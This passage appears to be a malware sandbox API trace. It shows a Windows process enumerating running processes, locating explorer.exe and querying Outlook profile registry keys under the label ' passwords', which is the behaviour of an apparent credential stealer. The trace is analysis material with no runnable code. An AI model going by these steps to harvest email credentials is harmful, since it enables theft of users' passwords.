(HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617100 [0186.927] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.927] GetProcessHeap () returned 0x560000 [0186.927] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.927] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.928] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.928] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x38c) returned 0x1f4 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617250 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171d0 [0186.928] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.928] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617100 [0186.928] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.928] GetProcessHeap () returned 0x560000 [0186.928] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.928] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.929] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.929] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x3e0) returned 0x1f8 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617100 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617210 [0186.929] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.929] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.929] GetProcessHeap () returned 0x560000 [0186.929] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.929] GetProcessHeap () returned 0x560000 [0186.930] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x6171d0 [0186.930] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.930] GetProcessHeap () returned 0x560000 [0186.930] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.930] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.930] GetProcessHeap () returned 0x560000 [0186.930] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617180 [0186.930] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.930] GetProcessHeap () returned 0x560000 [0186.930] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.930] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x3ec) returned 0x1fc [0186.931] GetProcessHeap () returned 0x560000 [0186.931] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171c0 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617100 [0186.931] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.931] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617180 [0186.931] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.931] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x47, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.931] GetProcessHeap () returned 0x560000 [0186.931] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617270 [0186.932] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.932] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x60) returned 0x200 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617210 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171d0 [0186.932] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.932] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617100 [0186.932] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.932] GetProcessHeap () returned 0x560000 [0186.932] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.932] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617100 [0186.933] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.933] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x468) returned 0x204 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171e0 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x6171c0 [0186.933] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.933] StrStrIA (lpFirst="svchost.exe", lpSrch="explorer.exe") returned 0x0 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.933] GetProcessHeap () returned 0x560000 [0186.933] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617250 [0186.933] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.933] GetProcessHeap () returned 0x560000 [0186.934] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.934] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171c0 [0186.934] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.934] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x4bc) returned 0x208 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171d0 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617250 [0186.934] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.934] StrStrIA (lpFirst="spoolsv.exe", lpSrch="explorer.exe") returned 0x0 [0186.934] GetProcessHeap () returned 0x560000 [0186.934] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.935] GetProcessHeap () returned 0x560000 [0186.935] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617210 [0186.935] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.935] GetProcessHeap () returned 0x560000 [0186.935] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.935] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0186.935] GetProcessHeap () returned 0x560000 [0186.935] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617190 [0186.935] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.935] GetProcessHeap () returned 0x560000 [0186.935] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617190 | out: hHeap=0x560000) returned 1 [0186.935] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x568) returned 0x20c [0186.935] GetProcessHeap () returned 0x560000 [0186.935] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x617250 [0186.935] GetProcessHeap () returned 0x560000 [0186.935] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617180 [0186.936] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.936] GetProcessHeap () returned 0x560000 [0186.936] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.936] StrStrIA (lpFirst="sihost.exe", lpSrch="explorer.exe") returned 0x0 [0186.936] GetProcessHeap () returned 0x560000 [0186.936] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.936] GetProcessHeap () returned 0x560000 [0186.936] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xe) returned 0x617140 [0186.936] GetProcAddress (hModule=0x7ffb26230000, lpProcName="Process32Next") returned 0x7ffb262786c0 [0186.936] GetProcessHeap () returned 0x560000 [0186.936] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.936] Process32Next (in: hSnapshot=0x1d0, lppe=0x231fc30 | out: lppe=0x231fc30*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0186.936] GetProcessHeap () returned 0x560000 [0186.936] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617100 [0186.937] GetProcAddress (hModule=0x7ffb26230000, lpProcName="OpenProcess") returned 0x7ffb2624eb80 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.937] OpenProcess (dwDesiredAccess=0x440, bInheritHandle=0, dwProcessId=0x640) returned 0x210 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xd) returned 0x6171c0 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x9) returned 0x617100 [0186.937] GetProcAddress (hModule=0x7ffb262e0000, lpProcName="StrStrIA") returned 0x7ffb262ee1d0 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617100 | out: hHeap=0x560000) returned 1 [0186.937] StrStrIA (lpFirst="explorer.exe", lpSrch="explorer.exe") returned="explorer.exe" [0186.937] GetProcessHeap () returned 0x560000 [0186.937] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617140 [0186.937] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.937] CloseHandle (hObject=0x1d0) returned 1 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.937] GetProcAddress (hModule=0x7ffb26230000, lpProcName="CloseHandle") returned 0x7ffb2625d650 [0186.937] GetProcessHeap () returned 0x560000 [0186.937] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.937] CloseHandle (hObject=0x210) returned 1 [0186.938] GetProcessHeap () returned 0x560000 [0186.938] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615c60 [0186.938] GetProcAddress (hModule=0x7ffb26230000, lpProcName="ProcessIdToSessionId") returned 0x7ffb26253720 [0186.938] GetProcessHeap () returned 0x560000 [0186.938] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615c60 | out: hHeap=0x560000) returned 1 [0186.938] ProcessIdToSessionId (in: dwProcessId=0x640, pSessionId=0x231fdb8 | out: pSessionId=0x231fdb8) returned 1 [0186.938] lstrlenA (lpString=" passwords") returned 10 [0186.938] GetProcessHeap () returned 0x560000 [0186.938] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb) returned 0x617100 [0186.938] lstrcpyA (in: lpString1=0x617100, lpString2=" passwords" | out: lpString1=" passwords") returned=" passwords" [0186.938] lstrlenA (lpString="Outlook") returned 7 [0186.938] GetProcessHeap () returned 0x560000 [0186.938] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x617110 [0186.938] lstrcpyA (in: lpString1=0x617110, lpString2="Outlook" | out: lpString1="Outlook") returned="Outlook" [0186.938] GetProcessHeap () returned 0x560000 [0186.938] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x8) returned 0x6171c0 [0186.938] GetProcessHeap () returned 0x560000 [0186.939] RtlReAllocateHeap (Heap=0x560000, Flags=0x0, Ptr=0x6171c0, Size=0x23) returned 0x613620 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x15) returned 0x615ea0 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x615ea0 | out: hHeap=0x560000) returned 1 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617120 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x62) returned 0x610840 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617270 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171c0 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617130 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616ad0 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617140 [0186.939] GetProcessHeap () returned 0x560000 [0186.939] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617150 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617160 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171c0 | out: hHeap=0x560000) returned 1 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x6171d0 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171d0 | out: hHeap=0x560000) returned 1 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x6171e0 [0186.940] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x6171e0 | out: hHeap=0x560000) returned 1 [0186.940] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Outlook\\Profiles\\Outlook", phkResult=0x231f570 | out: phkResult=0x231f570*=0x0) returned 0x2 [0186.940] GetProcessHeap () returned 0x560000 [0186.940] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617130 [0186.941] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.941] RegCloseKey (hKey=0x0) returned 0x6 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617130 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616ad0 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x610840 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x38) returned 0x616ad0 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617080 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617250 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617210 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617180 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x40) returned 0x616b10 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617130 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617270 [0186.941] GetProcessHeap () returned 0x560000 [0186.941] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617140 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617150 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617180 | out: hHeap=0x560000) returned 1 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617210 | out: hHeap=0x560000) returned 1 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617250 | out: hHeap=0x560000) returned 1 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617080 | out: hHeap=0x560000) returned 1 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x5) returned 0x617160 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.942] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegOpenKeyA") returned 0x7ffb28a6a960 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.942] RegOpenKeyA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook", phkResult=0x231f570 | out: phkResult=0x231f570*=0x0) returned 0x2 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xc) returned 0x617160 [0186.942] GetProcAddress (hModule=0x7ffb28a50000, lpProcName="RegCloseKey") returned 0x7ffb28a66620 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617160 | out: hHeap=0x560000) returned 1 [0186.942] RegCloseKey (hKey=0x0) returned 0x6 [0186.942] GetProcessHeap () returned 0x560000 [0186.942] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1) returned 0x617250 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617130 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617270 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617140 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x617150 | out: hHeap=0x560000) returned 1 [0186.943] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x616b10 | out: hHeap=0x560000) returned 1 [0186.943] GetProcessHeap () returned 0x560000 [0186.943] 